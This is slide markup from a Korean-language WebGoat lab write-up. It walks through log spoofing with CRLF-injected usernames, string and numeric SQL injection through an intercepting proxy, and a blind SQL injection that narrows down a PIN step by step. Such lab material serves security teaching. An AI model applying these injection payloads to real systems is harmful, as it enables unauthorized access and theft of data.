            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이 실행되며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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>정보가 출력됨과 동시에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Congratulation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 나오며 초록색 체크박스가 생성된다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Command Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Complete.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18542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Log Spoofing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56176" y="1700808"/>
            <a:ext cx="2664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Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>으로 로그인 한 로그를 남기는 것이 목적인 문제이다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우선 어떤 방식으로 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>기록되는지 알아야 할 필요가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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 이용하여 로그가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>어떤식으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 기록되는지 알아보자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9" y="1916832"/>
            <a:ext cx="580833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9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Log Spoofing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12160" y="950519"/>
            <a:ext cx="29807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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Trap Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 해본 결과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&lt;pre&gt;Login failed for user name : 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&lt;/pre&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 로그에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>남는다는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 알 수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아마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>입력값인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haha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en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Login failed for user name :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삽입된것으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 추정된다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&lt;pre&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>태그는 공백문자를 완벽히 기록하는 태그로서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개행을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 진행하면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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>단일 로그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보이는 로그를 남길 수 있을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5660176" cy="446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6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Log Spoofing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592611"/>
            <a:ext cx="8813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Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>에 다음과 같은 명령어를 입력해 보았다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haha%0d%0aLogin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Succeeded for username: admin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명령어를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>입력할시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예상대로라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>면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Login failed for username: haha%0d%0aLogin Succeeded for username: admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>되어 기록된다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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>%0d%0a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개행을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 의미하므로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로그파일에는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Login failed for username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>haha</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Login Succeeded for username: admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>으</a:t>
            </a:r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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>기록되어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마치 각각의 로그가 한번씩 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>남은것으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 보이게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하지도 않은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>의 정보가 로그에 남는 것처럼 보이게 하는 것이다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73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Log Spoofing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16216" y="1988840"/>
            <a:ext cx="2332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로그파일에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>두줄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로그가 남게 되었고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Congratulations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지를 받을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Log Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Complete.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92610"/>
            <a:ext cx="63055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7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LAB Stage 1 :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7608" y="1988840"/>
            <a:ext cx="2541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네빌이라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계정으로 접속하고자 하는데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비밀번호를 모르고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로그인하고자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String Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통해 비밀번호 없이 로그인 하는 문제이다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" y="1484784"/>
            <a:ext cx="6114384" cy="416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7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LAB Stage 1 :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7608" y="1988840"/>
            <a:ext cx="2541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1’ or ‘1’ = ‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 입력하면 간단히 해결되는 문제이지만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본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에서는 글자수 제한이 걸려있어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>1’ or ‘1’ = ‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 모두 입력할 수 없어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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 이용하도록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" y="1484784"/>
            <a:ext cx="6114384" cy="416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8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LAB Stage 1 :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20469" y="2420888"/>
            <a:ext cx="2541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 = 1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 되어있는 부분을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1’ or ‘1’ = ‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 변경하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>네빌로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 로그인 할 수 있을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6" y="1587538"/>
            <a:ext cx="6012160" cy="449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4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LAB Stage 1 :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20469" y="2420888"/>
            <a:ext cx="2541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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로 변경한 뒤에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Continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 클릭하면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>네빌</a:t>
            </a:r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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로그인 할 수 있으며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Congratulation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지를 받을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String SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Complete.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5" y="1628800"/>
            <a:ext cx="5511899" cy="439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0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Phishing With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426" y="5333769"/>
            <a:ext cx="875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dhy03196</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Password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haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 입력한 뒤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버튼을 누르자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Hack()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>함수에 들어간 로그인 정보가 표시되며 위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>와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메시지를 출력한다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9" y="1633538"/>
            <a:ext cx="72961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5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532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LAB Stage 2 : Parameterized Query #1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20469" y="2420888"/>
            <a:ext cx="2541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LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이라는 메시지가 있으면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Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>하고 다음 문제로 넘어가라고 하셔서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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6181"/>
            <a:ext cx="5924933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6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979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LAB Stage 3 : Numeric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20469" y="2564904"/>
            <a:ext cx="2541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사원 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Larry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 통해 접속하여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SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통해 사장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>네빌의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 정보를 알아보는 문제이다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" y="1804987"/>
            <a:ext cx="5948977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5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979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LAB Stage 3 : Numeric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20469" y="2564904"/>
            <a:ext cx="2541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Paros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Trap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>걸고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ViewProfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 클릭하면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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>같은 메시지를 잡아 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316663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Employee_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=101&amp;action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ViewProfile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err="1" smtClean="0"/>
              <a:t>Employee_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=101 or 1 = 1 order by salary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>desc&amp;action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ViewProfile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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>사장인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>네빌이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Salary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가장 높을 것으로 추정되기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0" y="1628800"/>
            <a:ext cx="6089645" cy="34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7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979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LAB Stage 3 : Numeric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68144" y="2564904"/>
            <a:ext cx="2993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네빌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>프로필이 열리고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Stage Complete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지가 나타난다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SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Larry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>에서 사장 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>네빌의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 프로필을 훔쳐볼 수 있다는 것을 증명하였다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Numeric SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Complete. </a:t>
            </a:r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5220331" cy="3891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4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532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LAB Stage 4 : Parameterized Query #2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20469" y="2420888"/>
            <a:ext cx="2541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LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이라는 메시지가 있으면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Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>하고 다음 문제로 넘어가라고 하셔서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Skip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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7" y="1772816"/>
            <a:ext cx="604867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6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Numeric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20469" y="2564904"/>
            <a:ext cx="2541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 Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통해</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>cc_number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> = 1111222233334444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>일 때</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>pins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있는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Pin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>필드의 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>구하는</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>목표인 문제이다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SQL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통해 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>답</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>스무고개 하듯이</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>추측하면 답을 알아 낼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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32741"/>
            <a:ext cx="6048672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5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Numeric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9" y="1628800"/>
            <a:ext cx="51054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1628800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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>and (select pin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 = '1111222233334444') &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>10000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>쿼리를 입력하였더니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Invalid account number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는 결과가 나왔다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pin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보다 적다는 것을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9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Numeric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1628800"/>
            <a:ext cx="2952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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>and (select pin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 = '1111222233334444') &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>5000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>쿼리를 입력하였더니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Invalid account number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는 결과가 나왔다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pin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보다 적다는 것을 의미한다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이런식으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 반씩 줄여가며 범위를 좁힌다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8" y="1628800"/>
            <a:ext cx="452437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Numeric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1628800"/>
            <a:ext cx="2952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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>and (select pin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 = '1111222233334444') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&gt;= 1250</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>쿼리를 입력하였더니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드디</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Account number is valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>라는 결과가 나왔다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pin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1250</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>보다는 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>크다는 것을 의미한다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1250 &lt;= pin &lt; 2500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>으</a:t>
            </a:r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ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>범위를 줄였다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6" y="1585134"/>
            <a:ext cx="4524375" cy="328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6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Numeric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 계속해서 임의의 값을 넣으며 범위를 줄여나갔다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2000 &lt;= pin &lt; 2500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2200 &lt;= pin &lt; 2500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2200 &lt;= pin &lt; 2400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2300 &lt;= pin &lt; 2400.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2330 &lt;= pin &lt; 2400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2350 &lt;= pin &lt; 2400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2350 &lt;= pin &lt; 2380</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2360 &lt;= pin &lt; 2380</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2360 &lt;= pin &lt; 2370</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2360 &lt;= pin &lt; 2365</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>2362 &lt;= pin &lt; 2365</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
